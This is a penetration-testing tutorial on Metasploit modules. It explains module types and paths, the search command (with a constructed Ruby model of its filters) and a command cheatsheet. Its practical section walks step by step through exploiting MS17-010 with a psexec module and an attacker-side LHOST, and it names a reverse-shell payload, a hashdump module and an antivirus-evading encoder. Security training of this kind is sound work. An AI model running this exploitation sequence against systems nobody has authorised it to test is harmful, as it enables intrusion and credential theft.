# Working with Metasploit Modules

## **Overview of Metasploit Modules**

Metasploit's modules are pre-built scripts designed for specific tasks such as vulnerability scanning, exploitation, post-exploitation, and evasion. They are a cornerstone of the framework, enabling penetration testers to streamline their workflows and automate tasks.

**Purpose of Modules:**

* Automate repetitive processes.
* Enhance manual testing by providing reusable functionality.
* Organize tools and exploits into categorized scripts.

### **Types of Metasploit Modules**

1. **Auxiliary Modules:**
   * Non-exploit modules for scanning, fuzzing, sniffing, and information gathering.
   * Example:

     ```bash
     auxiliary/scanner/smb/smb_version
     ```
2. **Encoders:**
   * Modify payloads to bypass detection mechanisms like antivirus (AV).
   * Example:

     ```bash
     x86/shikata_ga_nai
     ```
3. **Exploits:**
   * Exploit vulnerabilities in systems or applications.
   * Example:

     ```bash
     exploit/windows/smb/ms17_010_eternalblue
     ```
4. **NOPs (No-Operation):**
   * Generate no-operation (NOP) instructions used to pad a payload to a consistent size, which keeps it stable in memory.
   * Example:

     ```bash
     generic/nop
     ```
5. **Payloads:**
   * Code delivered to the target, often used to establish remote access.
   * Example:

     ```bash
     windows/meterpreter/reverse_tcp
     ```
6. **Post-Exploitation Modules:**
   * Perform tasks after gaining access, such as lateral movement or data extraction.
   * Example:

     ```bash
     post/windows/gather/hashdump
     ```
7. **Plugins:**
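   * Extend Metasploit's functionality with additional features, such as integrations with external tools. Unlike the module types above, plugins are loaded into the console with the `load` command rather than `use`.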
   * Example:

     ```bash
     openvas
     ```

### **Module Structure**

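Modules are organized hierarchically based on their type, target OS, service, and functionality. Exploit modules follow this layout most closely; as the examples above show, other types vary (an auxiliary scanner has a function category such as `scanner` where the OS would be, and payloads and encoders are usually referenced without the type prefix).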

**General Format:**

```
<type>/<os>/<service>/<module_name>
```

**Example:**

```
exploit/windows/http/iis_webdav_scstoragepathfromurl
```

**Components Explained:**

1. **Type:** Module category (e.g., `exploit`, `auxiliary`).
2. **Operating System:** Target OS (e.g., `windows`, `linux`).
3. **Service:** Vulnerable application or protocol (e.g., `http`, `smb`).
4. **Name:** Descriptive identifier of the module.

### **Searching for Modules**

Use the `search` command to locate modules based on specific criteria.

**Syntax:**

```bash
search [<options>] [<keywords>:<value>]
```

**Examples:**

* Search for modules related to MS17-010:

  ```bash
  search ms17_010
  ```
* Filter by CVE and module type (here, exploits whose CVE reference contains `2009`):

  ```bash
  search cve:2009 type:exploit
  ```
* Exclude specific platforms (e.g., Linux):

  ```bash
  search platform:-linux
  ```

**Search Options:**

| Option        | Description                             |
| ------------- | --------------------------------------- |
| `-h`          | Displays help for the `search` command. |
| `-o <file>`   | Saves search results to a file.         |
| `-S <regex>`  | Applies a regex filter to results.      |
| `-s <column>` | Sorts results by a specific column.     |
| `-r`          | Reverses the sort order.                |
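
A simplified model of how the `keyword:value` filters above combine, written as an added example (it is not Metasploit's own code). It assumes terms are ANDed and that a leading `-` on a value excludes matches; the module index and its placeholder CVE strings are constructed for illustration.

```ruby
# Constructed module index (sample metadata, not Metasploit's real database).
Mod = Struct.new(:path, :type, :platform, :cve)

MODULES = [
  Mod.new("exploit/windows/smb/sample_smb_rce",   "exploit",   "windows", "CVE-2009-EXAMPLE1"),
  Mod.new("exploit/linux/http/sample_http_rce",   "exploit",   "linux",   "CVE-2009-EXAMPLE2"),
  Mod.new("auxiliary/scanner/smb/sample_version", "auxiliary", "windows", nil),
  Mod.new("exploit/windows/http/sample_webdav",   "exploit",   "windows", "CVE-2017-EXAMPLE3"),
].freeze

# Keywords this model understands; anything else is treated as free text.
FIELDS = %i[type platform cve].freeze

# Split a query into [field, value, negated] terms. A bare word is a
# free-text term matched against the module path.
def parse_query(query)
  query.split.map do |term|
    key, value = term.split(":", 2)
    if value && FIELDS.include?(key.to_sym)
      negated = value.start_with?("-")
      [key.to_sym, value.delete_prefix("-").downcase, negated]
    else
      [:path, term.downcase, false]
    end
  end
end

# Every term must hold (AND); a negated term must NOT match.
def search(query, modules = MODULES)
  terms = parse_query(query)
  modules.select do |m|
    terms.all? do |field, value, negated|
      hit = m[field].to_s.downcase.include?(value)
      negated ? !hit : hit
    end
  end.map(&:path)
end

puts search("cve:2009 type:exploit")
puts search("platform:-linux")
```

Combining filters narrows results quickly: in this model `cve:2009 platform:-linux` leaves a single module, which is the habit to build before running `use` on anything.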

## **Using Modules: Practical Example**

**Scenario:** Exploiting MS17-010 using the EternalRomance module.

1. **Search for the Exploit:**

   ```bash
   msf6 > search ms17_010
   ```
2. **Select the Module:**

   ```bash
   msf6 > use exploit/windows/smb/ms17_010_psexec
   ```
3. **View Module Information:**

   ```bash
   msf6 exploit(ms17_010_psexec) > info
   ```
4. **Configure Options:**

   ```bash
   msf6 exploit(ms17_010_psexec) > options
   msf6 exploit(ms17_010_psexec) > set RHOSTS <target_IP>
   msf6 exploit(ms17_010_psexec) > set LHOST <attacker_IP>
   ```
5. **Execute the Exploit:**

   ```bash
   msf6 exploit(ms17_010_psexec) > run
   ```
6. **Post-Exploitation:**
   * After gaining access, use payload commands (e.g., Meterpreter) to perform further actions such as privilege escalation or credential harvesting.

***

## **Command Cheatsheet**

| Command                | Description                                  |
| ---------------------- | -------------------------------------------- |
| `search <keyword>`     | Locate modules matching the keyword.         |
| `use <module_path>`    | Load a module into the console.              |
| `info`                 | Display detailed information about a module. |
| `show options`         | List configurable parameters for a module.   |
| `set <option> <value>` | Configure a specific option.                 |
| `run` or `exploit`     | Execute the module.                          |
| `show payloads`        | View payloads compatible with the module.    |
| `show targets`         | List targets supported by the module.        |


